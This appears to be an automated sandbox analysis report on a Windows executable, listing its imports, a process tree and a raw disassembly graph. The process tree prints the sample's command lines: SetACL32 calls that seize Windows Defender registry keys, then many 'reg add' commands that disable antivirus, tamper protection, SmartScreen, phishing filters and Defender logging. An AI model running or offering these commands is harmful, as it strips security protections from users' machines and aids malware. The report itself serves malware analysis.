              KERNEL32.dllGetTempPathA, GetFileSize, GetModuleFileNameA, GetCurrentProcess, CopyFileA, ExitProcess, SetEnvironmentVariableA, Sleep, GetTickCount, GetCommandLineA, lstrlenA, GetVersion, SetErrorMode, lstrcpynA, GetDiskFreeSpaceA, GlobalUnlock, GetWindowsDirectoryA, SetCurrentDirectoryA, GetLastError, CreateDirectoryA, CreateProcessA, RemoveDirectoryA, CreateFileA, GetTempFileNameA, ReadFile, WriteFile, lstrcpyA, MoveFileExA, lstrcatA, GetSystemDirectoryA, GetProcAddress, GetExitCodeProcess, WaitForSingleObject, CompareFileTime, SetFileAttributesA, GetFileAttributesA, GetShortPathNameA, MoveFileA, GetFullPathNameA, SetFileTime, SearchPathA, CloseHandle, lstrcmpiA, CreateThread, GlobalLock, lstrcmpA, FindFirstFileA, FindNextFileA, DeleteFileA, SetFilePointer, GetPrivateProfileStringA, FindClose, MultiByteToWideChar, FreeLibrary, MulDiv, WritePrivateProfileStringA, LoadLibraryExA, GetModuleHandleA, GlobalAlloc, GlobalFree, ExpandEnvironmentStringsA
              USER32.dllScreenToClient, GetSystemMenu, SetClassLongA, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongA, SetCursor, LoadCursorA, CheckDlgButton, GetMessagePos, LoadBitmapA, CallWindowProcA, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, PostQuitMessage, GetWindowRect, EnableMenuItem, CreatePopupMenu, GetSystemMetrics, SetDlgItemTextA, GetDlgItemTextA, MessageBoxIndirectA, CharPrevA, DispatchMessageA, PeekMessageA, ReleaseDC, EnableWindow, InvalidateRect, SendMessageA, DefWindowProcA, BeginPaint, GetClientRect, FillRect, DrawTextA, EndDialog, RegisterClassA, SystemParametersInfoA, CreateWindowExA, GetClassInfoA, DialogBoxParamA, CharNextA, ExitWindowsEx, GetDC, CreateDialogParamA, SetTimer, GetDlgItem, SetWindowLongA, SetForegroundWindow, LoadImageA, IsWindow, SendMessageTimeoutA, FindWindowExA, OpenClipboard, TrackPopupMenu, AppendMenuA, EndPaint, DestroyWindow, wsprintfA, ShowWindow, SetWindowTextA
              GDI32.dllSelectObject, SetBkMode, CreateFontIndirectA, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
              SHELL32.dllSHGetSpecialFolderLocation, ShellExecuteExA, SHGetPathFromIDListA, SHBrowseForFolderA, SHGetFileInfoA, SHFileOperationA
              ADVAPI32.dllAdjustTokenPrivileges, RegCreateKeyExA, RegOpenKeyExA, SetFileSecurityA, OpenProcessToken, LookupPrivilegeValueA, RegEnumValueA, RegDeleteKeyA, RegDeleteValueA, RegCloseKey, RegSetValueExA, RegQueryValueExA, RegEnumKeyA
              COMCTL32.dllImageList_Create, ImageList_AddMasked, ImageList_Destroy
              ole32.dllOleUninitialize, OleInitialize, CoTaskMemFree, CoCreateInstance

              Possible Origin

              Language of compilation systemCountry where language is spokenMap
              EnglishUnited States

              Network Behavior

              No network behavior found

              Statistics

              CPU Usage

              Click to jump to process

              Memory Usage

              Click to jump to process

              High Level Behavior Distribution

              Click to dive into process behavior distribution

              Behavior

              Click to jump to process

              System Behavior

              General

              Target ID:0
              Start time:19:41:04
              Start date:02/08/2023
              Path:C:\Users\user\Desktop\Ptmhbplhxb.exe
              Wow64 process (32bit):true
              Commandline:C:\Users\user\Desktop\Ptmhbplhxb.exe
              Imagebase:0x400000
              File size:3'596'632 bytes
              MD5 hash:92189D2D76DB2A5549F25E35A52A2451
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:low

              General

              Target ID:1
              Start time:19:41:04
              Start date:02/08/2023
              Path:C:\Windows\SysWOW64\cmd.exe
              Wow64 process (32bit):true
              Commandline:C:\Windows\system32\cmd.exe /c C:\Users\user~1\AppData\Local\Temp\nsq9535.tmp\do32.bat
              Imagebase:0xa60000
              File size:232'960 bytes
              MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:high

              General

              Target ID:2
              Start time:19:41:04
              Start date:02/08/2023
              Path:C:\Windows\System32\conhost.exe
              Wow64 process (32bit):false
              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Imagebase:0x7ff6edaf0000
              File size:625'664 bytes
              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:high

              General

              Target ID:3
              Start time:19:41:04
              Start date:02/08/2023
              Path:C:\Users\user\AppData\Local\Temp\nsq9535.tmp\SetACL32.exe
              Wow64 process (32bit):true
              Commandline:SetACL32 -on "HKLM\SOFTWARE\Microsoft\Windows Defender" -ot reg -actn setowner -ownr "n:Administrators"
              Imagebase:0xf50000
              File size:526'200 bytes
              MD5 hash:93B828ED97CB2C701364DF520DDD5331
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Antivirus matches:
              • Detection: 0%, ReversingLabs
              • Detection: 0%, Virustotal, Browse
              Reputation:low

              General

              Target ID:4
              Start time:19:41:05
              Start date:02/08/2023
              Path:C:\Users\user\AppData\Local\Temp\nsq9535.tmp\SetACL32.exe
              Wow64 process (32bit):true
              Commandline:SetACL32 -on "HKLM\SOFTWARE\Microsoft\Windows Defender" -ot reg -actn ace -ace "n:Administrators;p:full"
              Imagebase:0xf50000
              File size:526'200 bytes
              MD5 hash:93B828ED97CB2C701364DF520DDD5331
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:low

              General

              Target ID:5
              Start time:19:41:05
              Start date:02/08/2023
              Path:C:\Users\user\AppData\Local\Temp\nsq9535.tmp\SetACL32.exe
              Wow64 process (32bit):true
              Commandline:SetACL32 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" -ot reg -actn setowner -ownr "n:Administrators"
              Imagebase:0xf50000
              File size:526'200 bytes
              MD5 hash:93B828ED97CB2C701364DF520DDD5331
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:low

              General

              Target ID:6
              Start time:19:41:06
              Start date:02/08/2023
              Path:C:\Users\user\AppData\Local\Temp\nsq9535.tmp\SetACL32.exe
              Wow64 process (32bit):true
              Commandline:SetACL32 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" -ot reg -actn ace -ace "n:Administrators;p:full"
              Imagebase:0x7ff6edaf0000
              File size:526'200 bytes
              MD5 hash:93B828ED97CB2C701364DF520DDD5331
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language

              General

              Target ID:7
              Start time:19:41:06
              Start date:02/08/2023
              Path:C:\Users\user\AppData\Local\Temp\nsq9535.tmp\SetACL32.exe
              Wow64 process (32bit):true
              Commandline:SetACL32 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\Signature Updates" -ot reg -actn setowner -ownr "n:Administrators"
              Imagebase:0xf50000
              File size:526'200 bytes
              MD5 hash:93B828ED97CB2C701364DF520DDD5331
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language

              General

              Target ID:8
              Start time:19:41:06
              Start date:02/08/2023
              Path:C:\Users\user\AppData\Local\Temp\nsq9535.tmp\SetACL32.exe
              Wow64 process (32bit):true
              Commandline:SetACL32 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\Signature Updates" -ot reg -actn ace -ace "n:Administrators;p:full"
              Imagebase:0xf50000
              File size:526'200 bytes
              MD5 hash:93B828ED97CB2C701364DF520DDD5331
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language

              General

              Target ID:9
              Start time:19:41:07
              Start date:02/08/2023
              Path:C:\Users\user\AppData\Local\Temp\nsq9535.tmp\SetACL32.exe
              Wow64 process (32bit):true
              Commandline:SetACL32 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\UX Configuration" -ot reg -actn setowner -ownr "n:Administrators"
              Imagebase:0xf50000
              File size:526'200 bytes
              MD5 hash:93B828ED97CB2C701364DF520DDD5331
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language

              General

              Target ID:10
              Start time:19:41:07
              Start date:02/08/2023
              Path:C:\Users\user\AppData\Local\Temp\nsq9535.tmp\SetACL32.exe
              Wow64 process (32bit):true
              Commandline:SetACL32 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\UX Configuration" -ot reg -actn ace -ace "n:Administrators;p:full"
              Imagebase:0xf50000
              File size:526'200 bytes
              MD5 hash:93B828ED97CB2C701364DF520DDD5331
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language

              General

              Target ID:11
              Start time:19:41:08
              Start date:02/08/2023
              Path:C:\Windows\SysWOW64\reg.exe
              Wow64 process (32bit):true
              Commandline:reg add "HKLM\SOFTWARE\Microsoft\Windows Defender" /v "DisableAntiVirus" /t reg_DWORD /d "1" /f
              Imagebase:0x12a0000
              File size:59'392 bytes
              MD5 hash:CEE2A7E57DF2A159A065A34913A055C2
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language

              General

              Target ID:12
              Start time:19:41:08
              Start date:02/08/2023
              Path:C:\Windows\SysWOW64\reg.exe
              Wow64 process (32bit):true
              Commandline:reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" /v "TamperProtection" /t reg_DWORD /d "4" /f
              Imagebase:0x12a0000
              File size:59'392 bytes
              MD5 hash:CEE2A7E57DF2A159A065A34913A055C2
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language

              General

              Target ID:13
              Start time:19:41:08
              Start date:02/08/2023
              Path:C:\Windows\SysWOW64\reg.exe
              Wow64 process (32bit):true
              Commandline:reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" /v "TamperProtectionSource" /t reg_DWORD /d "2" /f
              Imagebase:0x12a0000
              File size:59'392 bytes
              MD5 hash:CEE2A7E57DF2A159A065A34913A055C2
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language

              General

              Target ID:14
              Start time:19:41:08
              Start date:02/08/2023
              Path:C:\Windows\SysWOW64\reg.exe
              Wow64 process (32bit):true
              Commandline:reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\UX Configuration" /v "DisablePrivacyMode" /t reg_DWORD /d "1" /f
              Imagebase:0x12a0000
              File size:59'392 bytes
              MD5 hash:CEE2A7E57DF2A159A065A34913A055C2
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language

              General

              Target ID:15
              Start time:19:41:09
              Start date:02/08/2023
              Path:C:\Windows\SysWOW64\reg.exe
              Wow64 process (32bit):true
              Commandline:reg add "HKLM\SYSTEM\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t reg_DWORD /d "0" /f
              Imagebase:0x12a0000
              File size:59'392 bytes
              MD5 hash:CEE2A7E57DF2A159A065A34913A055C2
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language

              General

              Target ID:16
              Start time:19:41:09
              Start date:02/08/2023
              Path:C:\Windows\SysWOW64\reg.exe
              Wow64 process (32bit):true
              Commandline:reg add "HKLM\SYSTEM\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t reg_DWORD /d "0" /f
              Imagebase:0x12a0000
              File size:59'392 bytes
              MD5 hash:CEE2A7E57DF2A159A065A34913A055C2
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language

              General

              Target ID:17
              Start time:19:41:09
              Start date:02/08/2023
              Path:C:\Windows\SysWOW64\reg.exe
              Wow64 process (32bit):true
              Commandline:reg add "HKLM\SOFTWARE\Policies\Microsoft\MRT" /v "DontOfferThroughWUAU" /t reg_DWORD /d 1 /f
              Imagebase:0x12a0000
              File size:59'392 bytes
              MD5 hash:CEE2A7E57DF2A159A065A34913A055C2
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language

              General

              Target ID:18
              Start time:19:41:09
              Start date:02/08/2023
              Path:C:\Windows\SysWOW64\reg.exe
              Wow64 process (32bit):true
              Commandline:reg add "HKLM\SOFTWARE\Policies\Microsoft\MRT" /v "DontReportInfectionInformation" /t reg_DWORD /d 1 /f
              Imagebase:0x12a0000
              File size:59'392 bytes
              MD5 hash:CEE2A7E57DF2A159A065A34913A055C2
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language

              General

              Target ID:19
              Start time:19:41:10
              Start date:02/08/2023
              Path:C:\Windows\SysWOW64\reg.exe
              Wow64 process (32bit):true
              Commandline:reg add "HKLM\SOFTWARE\Microsoft\RemovalTools\MpGears" /v "SpyNetReportingLocation" /t reg_DWORD /d 0 /f
              Imagebase:0x12a0000
              File size:59'392 bytes
              MD5 hash:CEE2A7E57DF2A159A065A34913A055C2
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language

              General

              Target ID:20
              Start time:19:41:10
              Start date:02/08/2023
              Path:C:\Windows\SysWOW64\reg.exe
              Wow64 process (32bit):true
              Commandline:reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\System" /v "EnableSmartScreen" /t reg_DWORD /d 0 /f
              Imagebase:0x12a0000
              File size:59'392 bytes
              MD5 hash:CEE2A7E57DF2A159A065A34913A055C2
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language

              General

              Target ID:21
              Start time:19:41:10
              Start date:02/08/2023
              Path:C:\Windows\SysWOW64\reg.exe
              Wow64 process (32bit):true
              Commandline:reg add "HKLM\SOFTWARE\Policies\Microsoft\MicrosoftEdge\PhishingFilter" /v "EnabledV9" /t reg_DWORD /d 0 /f
              Imagebase:0x12a0000
              File size:59'392 bytes
              MD5 hash:CEE2A7E57DF2A159A065A34913A055C2
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language

              General

              Target ID:22
              Start time:19:41:10
              Start date:02/08/2023
              Path:C:\Windows\SysWOW64\reg.exe
              Wow64 process (32bit):true
              Commandline:reg add "HKLM\SOFTWARE\Policies\Microsoft\MicrosoftEdge\PhishingFilter" /v "PreventOverride" /t reg_DWORD /d 0 /f
              Imagebase:0x12a0000
              File size:59'392 bytes
              MD5 hash:CEE2A7E57DF2A159A065A34913A055C2
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language

              General

              Target ID:23
              Start time:19:41:10
              Start date:02/08/2023
              Path:C:\Windows\SysWOW64\reg.exe
              Wow64 process (32bit):true
              Commandline:reg add "HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer\PhishingFilter" /v "EnabledV9" /t reg_DWORD /d 0 /f
              Imagebase:0x12a0000
              File size:59'392 bytes
              MD5 hash:CEE2A7E57DF2A159A065A34913A055C2
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language

              General

              Target ID:24
              Start time:19:41:10
              Start date:02/08/2023
              Path:C:\Windows\SysWOW64\reg.exe
              Wow64 process (32bit):true
              Commandline:reg add "HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer\PhishingFilter" /v "PreventOverride" /t reg_DWORD /d 0 /f
              Imagebase:0x12a0000
              File size:59'392 bytes
              MD5 hash:CEE2A7E57DF2A159A065A34913A055C2
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language

              General

              Target ID:25
              Start time:19:41:11
              Start date:02/08/2023
              Path:C:\Windows\SysWOW64\reg.exe
              Wow64 process (32bit):true
              Commandline:reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer" /v "SmartScreenEnabled" /t reg_SZ /d "Off" /f
              Imagebase:0x12a0000
              File size:59'392 bytes
              MD5 hash:CEE2A7E57DF2A159A065A34913A055C2
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language

              General

              Target ID:26
              Start time:19:41:11
              Start date:02/08/2023
              Path:C:\Windows\SysWOW64\reg.exe
              Wow64 process (32bit):true
              Commandline:reg add "HKCU\SOFTWARE\Policies\Microsoft\Edge" /v "SmartScreenEnabled" /t reg_DWORD /d 0 /f
              Imagebase:0x12a0000
              File size:59'392 bytes
              MD5 hash:CEE2A7E57DF2A159A065A34913A055C2
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language

              General

              Target ID:27
              Start time:19:41:11
              Start date:02/08/2023
              Path:C:\Windows\SysWOW64\reg.exe
              Wow64 process (32bit):true
              Commandline:reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\AppHost" /v "SmartScreenEnabled" /t reg_SZ /d "Off" /f
              Imagebase:0x12a0000
              File size:59'392 bytes
              MD5 hash:CEE2A7E57DF2A159A065A34913A055C2
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language

              General

              Target ID:28
              Start time:19:41:11
              Start date:02/08/2023
              Path:C:\Windows\SysWOW64\reg.exe
              Wow64 process (32bit):true
              Commandline:reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\AppHost" /v "EnableWebContentEvaluation" /t reg_DWORD /d 0 /f
              Imagebase:0x12a0000
              File size:59'392 bytes
              MD5 hash:CEE2A7E57DF2A159A065A34913A055C2
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language

              General

              Target ID:29
              Start time:19:41:11
              Start date:02/08/2023
              Path:C:\Windows\SysWOW64\reg.exe
              Wow64 process (32bit):true
              Commandline:reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\AppHost" /v "PreventOverride" /t reg_DWORD /d 0 /f
              Imagebase:0x12a0000
              File size:59'392 bytes
              MD5 hash:CEE2A7E57DF2A159A065A34913A055C2
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language

              General

              Target ID:30
              Start time:19:41:12
              Start date:02/08/2023
              Path:C:\Windows\SysWOW64\reg.exe
              Wow64 process (32bit):true
              Commandline:reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\AppHost" /v "EnableWebContentEvaluation" /t reg_DWORD /d 0 /f
              Imagebase:0x12a0000
              File size:59'392 bytes
              MD5 hash:CEE2A7E57DF2A159A065A34913A055C2
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language

              General

              Target ID:31
              Start time:19:41:12
              Start date:02/08/2023
              Path:C:\Windows\SysWOW64\reg.exe
              Wow64 process (32bit):true
              Commandline:reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\AppHost" /v "PreventOverride" /t reg_DWORD /d 0 /f
              Imagebase:0x12a0000
              File size:59'392 bytes
              MD5 hash:CEE2A7E57DF2A159A065A34913A055C2
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language

              General

              Target ID:32
              Start time:19:41:12
              Start date:02/08/2023
              Path:C:\Windows\SysWOW64\reg.exe
              Wow64 process (32bit):true
              Commandline:reg add "HKCU\Software\Microsoft\Windows Security Health\State" /v "AppAndBrowser_EdgeSmartScreenOff" /t REG_DWORD /d 0 /f
              Imagebase:0x12a0000
              File size:59'392 bytes
              MD5 hash:CEE2A7E57DF2A159A065A34913A055C2
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language

              General

              Target ID:33
              Start time:19:41:12
              Start date:02/08/2023
              Path:C:\Windows\SysWOW64\reg.exe
              Wow64 process (32bit):true
              Commandline:reg add "HKCU\Software\Microsoft\Windows Security Health\State" /v "AppAndBrowser_StoreAppsSmartScreenOff" /t reg_DWORD /d 0 /f
              Imagebase:0x12a0000
              File size:59'392 bytes
              MD5 hash:CEE2A7E57DF2A159A065A34913A055C2
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language

              General

              Target ID:34
              Start time:19:41:13
              Start date:02/08/2023
              Path:C:\Windows\SysWOW64\reg.exe
              Wow64 process (32bit):true
              Commandline:reg add "HKCU\Software\Microsoft\Windows Security Health\State" /v "AccountProtection_MicrosoftAccount_Disconnected" /t REG_DWORD /d 1 /f
              Imagebase:0x12a0000
              File size:59'392 bytes
              MD5 hash:CEE2A7E57DF2A159A065A34913A055C2
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language

              General

              Target ID:35
              Start time:19:41:13
              Start date:02/08/2023
              Path:C:\Windows\SysWOW64\reg.exe
              Wow64 process (32bit):true
              Commandline:reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "RandomizeScheduleTaskTimes" /t reg_DWORD /d "0" /f
              Imagebase:0x12a0000
              File size:59'392 bytes
              MD5 hash:CEE2A7E57DF2A159A065A34913A055C2
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language

              General

              Target ID:36
              Start time:19:41:13
              Start date:02/08/2023
              Path:C:\Windows\SysWOW64\reg.exe
              Wow64 process (32bit):true
              Commandline:reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "PUAProtection" /t reg_DWORD /d "0" /f
              Imagebase:0x12a0000
              File size:59'392 bytes
              MD5 hash:CEE2A7E57DF2A159A065A34913A055C2
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language

              General

              Target ID:37
              Start time:19:41:13
              Start date:02/08/2023
              Path:C:\Windows\SysWOW64\reg.exe
              Wow64 process (32bit):true
              Commandline:reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t reg_DWORD /d 1 /f
              Imagebase:0x12a0000
              File size:59'392 bytes
              MD5 hash:CEE2A7E57DF2A159A065A34913A055C2
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language

              General

              Target ID:38
              Start time:19:41:14
              Start date:02/08/2023
              Path:C:\Windows\SysWOW64\reg.exe
              Wow64 process (32bit):true
              Commandline:reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions" /v "DisableAutoExclusions" /t reg_DWORD /d "1" /f
              Imagebase:0x12a0000
              File size:59'392 bytes
              MD5 hash:CEE2A7E57DF2A159A065A34913A055C2
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language

              General

              Target ID:39
              Start time:19:41:14
              Start date:02/08/2023
              Path:C:\Windows\SysWOW64\reg.exe
              Wow64 process (32bit):true
              Commandline:reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t reg_DWORD /d "0" /f
              Imagebase:0x12a0000
              File size:59'392 bytes
              MD5 hash:CEE2A7E57DF2A159A065A34913A055C2
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language

              General

              Target ID:40
              Start time:19:41:14
              Start date:02/08/2023
              Path:C:\Windows\SysWOW64\reg.exe
              Wow64 process (32bit):true
              Commandline:reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Quarantine" /v "PurgeItemsAfterDelay" /t reg_DWORD /d "0" /f
              Imagebase:0x12a0000
              File size:59'392 bytes
              MD5 hash:CEE2A7E57DF2A159A065A34913A055C2
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language

              General

              Target ID:41
              Start time:19:41:14
              Start date:02/08/2023
              Path:C:\Windows\SysWOW64\reg.exe
              Wow64 process (32bit):true
              Commandline:reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Quarantine" /v "LocalSettingOverridePurgeItemsAfterDelay" /t reg_DWORD /d "0" /f
              Imagebase:0x12a0000
              File size:59'392 bytes
              MD5 hash:CEE2A7E57DF2A159A065A34913A055C2
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language

              Disassembly

              Reset < >

                Execution Graph

                Execution Coverage:16%
                Dynamic/Decrypted Code Coverage:0%
                Signature Coverage:21.3%
                Total number of Nodes:1262
                Total number of Limit Nodes:25
                execution_graph 3376 4025c4 3385 402a9f 3376->3385 3378 4025ce 3379 405b76 ReadFile 3378->3379 3380 40263e 3378->3380 3383 40264e 3378->3383 3384 40263c 3378->3384 3379->3378 3388 405ec3 wsprintfA 3380->3388 3382 402664 SetFilePointer 3382->3384 3383->3382 3383->3384 3386 405f87 17 API calls 3385->3386 3387 402ab4 3386->3387 3387->3378 3388->3384 3389 402245 3390 402ac1 17 API calls 3389->3390 3391 40224b 3390->3391 3392 402ac1 17 API calls 3391->3392 3393 402254 3392->3393 3394 402ac1 17 API calls 3393->3394 3395 40225d 3394->3395 3396 406268 2 API calls 3395->3396 3397 402266 3396->3397 3398 402277 lstrlenA lstrlenA 3397->3398 3402 40226a 3397->3402 3400 40508c 24 API calls 3398->3400 3399 40508c 24 API calls 3403 402272 3399->3403 3401 4022b3 SHFileOperationA 3400->3401 3401->3402 3401->3403 3402->3399 3404 4028c5 3405 402a9f 17 API calls 3404->3405 3406 4028cb 3405->3406 3407 402900 3406->3407 3408 402716 3406->3408 3410 4028dd 3406->3410 3407->3408 3409 405f87 17 API calls 3407->3409 3409->3408 3410->3408 3412 405ec3 wsprintfA 3410->3412 3412->3408 3273 401746 3274 402ac1 17 API calls 3273->3274 3275 40174d 3274->3275 3276 405b2d 2 API calls 3275->3276 3277 401754 3276->3277 3278 405b2d 2 API calls 3277->3278 3278->3277 3413 401947 3414 402ac1 17 API calls 3413->3414 3415 40194e lstrlenA 3414->3415 3416 402577 3415->3416 3417 4022c7 3418 4022ce 3417->3418 3421 4022e1 3417->3421 3419 405f87 17 API calls 3418->3419 3420 4022db 3419->3420 3422 405681 MessageBoxIndirectA 3420->3422 3422->3421 3423 4051ca 3424 405375 3423->3424 3425 4051ec GetDlgItem GetDlgItem GetDlgItem 3423->3425 3427 4053a5 3424->3427 3428 40537d GetDlgItem CreateThread CloseHandle 3424->3428 3468 40405b SendMessageA 3425->3468 3430 4053d3 3427->3430 3431 4053f4 3427->3431 3432 4053bb ShowWindow ShowWindow 3427->3432 3428->3427 3429 40525c 3435 405263 GetClientRect GetSystemMetrics SendMessageA SendMessageA 3429->3435 3433 40542e 3430->3433 3437 4053e3 3430->3437 3438 405407 ShowWindow 3430->3438 3477 40408d 3431->3477 3473 40405b SendMessageA 3432->3473 3433->3431 3445 40543b SendMessageA 3433->3445 3443 4052d1 3435->3443 3444 4052b5 SendMessageA SendMessageA 3435->3444 3474 403fff 3437->3474 3441 405427 3438->3441 3442 405419 3438->3442 3440 405400 3447 403fff SendMessageA 3441->3447 3446 40508c 24 API calls 3442->3446 3448 4052e4 3443->3448 3449 4052d6 SendMessageA 3443->3449 3444->3443 3445->3440 3450 405454 CreatePopupMenu 3445->3450 3446->3441 3447->3433 3469 404026 3448->3469 3449->3448 3451 405f87 17 API calls 3450->3451 3453 405464 AppendMenuA 3451->3453 3457 405482 GetWindowRect 3453->3457 3458 405495 TrackPopupMenu 3453->3458 3454 4052f4 3455 405331 GetDlgItem SendMessageA 3454->3455 3456 4052fd ShowWindow 3454->3456 3455->3440 3462 405358 SendMessageA SendMessageA 3455->3462 3459 405320 3456->3459 3460 405313 ShowWindow 3456->3460 3457->3458 3458->3440 3461 4054b1 3458->3461 3472 40405b SendMessageA 3459->3472 3460->3459 3463 4054d0 SendMessageA 3461->3463 3462->3440 3463->3463 3464 4054ed OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 3463->3464 3466 40550f SendMessageA 3464->3466 3466->3466 3467 405531 GlobalUnlock SetClipboardData CloseClipboard 3466->3467 3467->3440 3468->3429 3470 405f87 17 API calls 3469->3470 3471 404031 SetDlgItemTextA 3470->3471 3471->3454 3472->3455 3473->3430 3475 404006 3474->3475 3476 40400c SendMessageA 3474->3476 3475->3476 3476->3431 3478 4040a5 GetWindowLongA 3477->3478 3488 40412e 3477->3488 3479 4040b6 3478->3479 3478->3488 3480 4040c5 GetSysColor 3479->3480 3481 4040c8 3479->3481 3480->3481 3482 4040d8 SetBkMode 3481->3482 3483 4040ce SetTextColor 3481->3483 3484 4040f0 GetSysColor 3482->3484 3485 4040f6 3482->3485 3483->3482 3484->3485 3486 4040fd SetBkColor 3485->3486 3487 404107 3485->3487 3486->3487 3487->3488 3489 404121 CreateBrushIndirect 3487->3489 3490 40411a DeleteObject 3487->3490 3488->3440 3489->3488 3490->3489 3494 4020cb 3495 402ac1 17 API calls 3494->3495 3496 4020d2 3495->3496 3497 402ac1 17 API calls 3496->3497 3498 4020dc 3497->3498 3499 402ac1 17 API calls 3498->3499 3500 4020e6 3499->3500 3501 402ac1 17 API calls 3500->3501 3502 4020f0 3501->3502 3503 402ac1 17 API calls 3502->3503 3504 4020fa 3503->3504 3505 40213c CoCreateInstance 3504->3505 3506 402ac1 17 API calls 3504->3506 3509 40215b 3505->3509 3511 402206 3505->3511 3506->3505 3507 401423 24 API calls 3508 40223c 3507->3508 3510 4021e6 MultiByteToWideChar 3509->3510 3509->3511 3510->3511 3511->3507 3511->3508 3512 4026ce 3513 4026d4 3512->3513 3514 4026d8 FindNextFileA 3513->3514 3517 4026ea 3513->3517 3515 402729 3514->3515 3514->3517 3518 405f65 lstrcpynA 3515->3518 3518->3517 3519 40444f 3520 404485 3519->3520 3521 40445f 3519->3521 3523 40408d 8 API calls 3520->3523 3522 404026 18 API calls 3521->3522 3524 40446c SetDlgItemTextA 3522->3524 3525 404491 3523->3525 3524->3520 3526 4023d0 3527 402ac1 17 API calls 3526->3527 3528 4023e2 3527->3528 3529 402ac1 17 API calls 3528->3529 3531 4023ec 3529->3531 3530 402716 3531->3530 3532 402421 3531->3532 3533 402ac1 17 API calls 3531->3533 3534 40242d 3532->3534 3536 402a9f 17 API calls 3532->3536 3535 40241a lstrlenA 3533->3535 3537 40244c RegSetValueExA 3534->3537 3539 402f81 31 API calls 3534->3539 3535->3532 3536->3534 3538 402462 RegCloseKey 3537->3538 3538->3530 3539->3537 